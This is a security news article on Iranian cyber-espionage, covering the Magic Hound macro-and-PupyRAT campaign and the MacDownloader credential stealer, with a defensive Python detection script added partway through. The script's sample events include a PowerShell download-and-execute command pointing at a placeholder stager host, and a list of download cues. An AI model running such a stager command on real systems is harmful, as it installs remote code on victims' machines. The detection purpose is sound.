Security experts and intelligence agencies are observing a significant intensification of the cyber espionage campaigns linked to Iran-based hackers.
A few days ago, security researchers at Palo Alto Networks uncovered a new cyber espionage campaign linked to Iran that targeted several organizations in the Middle East. The threat actors hit numerous organizations in the energy, government, and technology industries; all of the victims are located in, or have business interests in, Saudi Arabia.
The hacking campaign was dubbed Magic Hound, and according to the analysts it dates back to at least mid-2016.
It is interesting to note that hackers behind the Magic Hound campaign used a wide range of custom tools and an open-source, cross-platform remote access tool (RAT) dubbed Pupy.
“According to the developer, PupyRAT is a “multi-platform (windows, linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in python.” CTU analysis confirms that PupyRAT can give the threat actor full access to the victim’s system.” reads the analysis published by SecureWorks.
The hackers’ arsenal includes different families of custom tools, including droppers, downloaders, executable loaders, document loaders and IRC bots.
“Unit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016 which we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility it has primarily targeted organizations in the energy, government, and technology sectors that are either in or have business interests in Saudi Arabia.” reads the analysis published by Palo Alto Networks. “Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters.”
Experts at SecureWorks are also monitoring the activity of the Iranian threat actor; they linked the attacks to a nation-state group tracked as COBALT GYPSY, which is associated with the government in Tehran.
The technique is not sophisticated: the hackers used spear-phishing messages carrying Word and Excel documents with embedded malicious macros. When a victim opens the document and enables the macro, a malicious payload is downloaded and executed.
“The downloaded document attempts to run a macro that then runs a PowerShell command. This command downloads two additional PowerShell scripts that install PupyRAT, an open-source remote access trojan (RAT),” reads the analysis published by SecureWorks.
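The infection chain described above (Office document, macro, PowerShell download, RAT install) leaves a very recognizable trace in endpoint telemetry: an Office process spawning a shell whose command line fetches remote content. The following detection script is an added example for defenders; it is not code from the article or from the SecureWorks or Unit 42 reports. It assumes process-creation events (such as Sysmon Event ID 1) have been flattened to `key=value` text with the field names `parent_image`, `image` and `cmdline`, which are assumptions of this example, and the sample events are constructed, not real Magic Hound artefacts.

```python
"""Flag Office applications spawning a shell that downloads and runs remote content.

Added example, not from the article or the vendor reports. Field names
(parent_image, image, cmdline) and all sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Office parents whose macros are the delivery vehicle in the reported campaign.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Interpreters a macro typically launches to stage the next payload.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Lower-cased substrings that usually indicate a download-and-execute stager.
DOWNLOAD_CUES = (
    "downloadstring", "downloadfile", "net.webclient", "invoke-webrequest",
    "iex ", "invoke-expression", "-enc", "-encodedcommand", "frombase64string",
)

# Constructed sample events (host names, users, paths and URL are placeholders).
SAMPLE_EVENTS = [
    'ts=2017-02-16T09:12:01Z host=WS-17 user=CORP\\jdoe parent_image="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://stager.example.invalid/a.ps1\')"',
    'ts=2017-02-16T09:14:27Z host=WS-22 user=CORP\\asmith parent_image="C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -enc QQBCAEMA"',
    'ts=2017-02-16T09:20:03Z host=WS-17 user=CORP\\jdoe parent_image="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" image="C:\\Windows\\splwow64.exe" cmdline="C:\\Windows\\splwow64.exe 8192"',
    'ts=2017-02-16T09:31:45Z host=WS-09 user=CORP\\admin parent_image="C:\\Windows\\explorer.exe" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe Get-Service"',
    'ts=2017-02-16T09:40:12Z host=WS-31 user=CORP\\mlee parent_image="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" image="C:\\Windows\\System32\\cmd.exe" cmdline="cmd.exe /c echo macro-test"',
]

# key=value pairs; values may be double-quoted (with backslash escapes) or bare.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened event line into a field dictionary."""
    fields: Dict[str, str] = {}
    for key, raw in _KV.findall(line):
        if raw.startswith('"') and raw.endswith('"'):
            raw = raw[1:-1].replace('\\"', '"')
        fields[key] = raw
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    host: str
    user: str
    parent: str
    child: str
    cues: List[str]
    severity: str


def evaluate(event: Dict[str, str]) -> Optional[Alert]:
    """Return an Alert when an Office app spawns a shell; escalate on download cues."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    if parent not in OFFICE_APPS or child not in SHELLS:
        return None
    cmd = event.get("cmdline", "").lower()
    cues = [cue for cue in DOWNLOAD_CUES if cue in cmd]
    severity = "high" if cues else "medium"
    return Alert(event.get("host", "?"), event.get("user", "?"), parent, child, cues, severity)


def scan(lines: List[str]) -> List[Alert]:
    """Run the rule over a batch of event lines and keep only the hits."""
    return [a for a in (evaluate(parse_event(line)) for line in lines) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.host} {alert.user}: {alert.parent} -> {alert.child} cues={alert.cues}")
```

The rule deliberately fires on any Office-to-shell parent/child pair (medium severity) and only raises severity when the command line carries a download or encoded-command cue; the benign Word-to-splwow64 and Explorer-to-PowerShell events pass untouched. In production the Office parent list, the shell list and the cue strings are the tuning knobs, and the medium-severity hits are what surface macros that stage their download in a second process.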
The malicious documents used in the attacks appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.
Figure 1 Malicious documents used in the Magic Hound Campaign (SecureWorks)
In January 2017, a cyber espionage group linked to the Iranian Government was found to be using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac computers.
The malicious code was discovered and analyzed by the malware researchers Claudio Guarnieri and Collin Anderson. The security duo discovered that the nation-state hackers disguised the malicious code as a Flash Player update and as a Bitdefender Adware Removal Tool.
The attacks observed by the researchers mostly targeted the defense industrial base sector, but the same threat actors also used the same malware in a targeted attack against a human rights advocate.
The malicious code does not appear to be sophisticated; according to the security duo it was “poorly” developed at the end of 2016 and its code was copied from other sources.
The problem is that, even though the code is very simple, MacDownloader was undetected by the virus scanning engines on VirusTotal at the time the analysis was written. More than a month later, less than half of the vendors were able to detect the bogus Flash Player and Bitdefender apps as a threat.
Once MacDownloader infects a device, the malware collects information about the host, including passwords stored in the Keychain.
“MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.
The experts discovered a first sample of the malware on a fake website of the aerospace firm United Technologies Corporation, the same website that was used in the past to spread Windows malware and the Browser Exploitation Framework (BeEF). The malware researchers linked MacDownloader to the activity of an Iranian threat actor known as Charming Kitten (aka Newscaster and NewsBeef).
The Newscaster hacker group made the headlines in 2014, when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.